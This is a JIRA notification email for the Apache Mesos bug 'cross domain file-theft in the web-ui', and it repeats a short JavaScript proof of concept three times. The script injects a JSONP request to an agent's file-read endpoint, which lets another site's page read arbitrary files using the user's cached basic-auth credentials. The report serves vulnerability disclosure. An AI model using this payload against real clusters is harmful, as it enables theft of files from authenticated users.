[
https://issues.apache.org/jira/browse/MESOS-7437?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Jacob Janco updated MESOS-7437:
-------------------------------
Description:
{code:javascript}
x=document.createElement('script')
x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
document.body.appendChild(x)
{code}
The above code pasted into the web console on http://example.com/, for example,
will yield the contents of the requested file. Basic auth is cached and resent
in browser tabs/windows as long as the user has authenticated during the
browser session.
was:
`x=document.createElement('script')
x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
document.body.appendChild(x)`
The above code pasted into the web console on http://example.com/, for example,
will yield the contents of the requested file. Basic auth is cached and resent
in browser tabs/windows as long as the user has authenticated during the
browser session.
> cross domain file-theft in the web-ui
> -------------------------------------
>
> Key: MESOS-7437
> URL: https://issues.apache.org/jira/browse/MESOS-7437
> Project: Mesos
> Issue Type: Bug
> Reporter: Jacob Janco
> Assignee: Jacob Janco
> Priority: Minor
>
> {code:javascript}
> x=document.createElement('script')
> x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
> document.body.appendChild(x)
> {code}
> The above code pasted into the web console on http://example.com/, for
> example, will yield the contents of the requested file. Basic auth is cached
> and resent in browser tabs/windows as long as the user has authenticated
> during the browser session.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
